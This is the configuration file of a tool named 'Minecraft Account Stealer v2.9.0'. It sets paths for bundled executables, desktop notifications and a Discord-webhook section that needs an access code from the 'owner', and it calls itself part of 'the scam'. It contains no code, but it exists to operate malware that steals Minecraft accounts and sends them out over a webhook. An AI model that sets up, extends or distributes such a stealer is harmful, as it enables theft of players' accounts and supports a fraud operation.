[Settings]
APPNAME=Minecraft Account Stealer v2.9.0
Scale=70,30
Compressed=Compressed.zip
_LOG=False
_DESKTOP_NOTIFINATIONS=True

[plugins]
# Changing Paths May cause issues with the program.
_DiscordMsg=%~dp0plugins\DiscordMsgPRO.exe
_LOG_PATH=%~dp0plugins\log.exe
_NOTIFIER=%~dp0plugins\notify\

[Custom Webhook]
# To use Custom Webhooks, you must have A Code.
# Contact the owner for the code. (Tester#1111)
CodeAccess=
WebhookURL=

# Details
# This File Was Downloaded from the Offical Github of
# https://github.com/agamsol/Minecraft-Stealer
# Config - The organizer of the scam.
# For Support Please Contach me, (Tester#1111)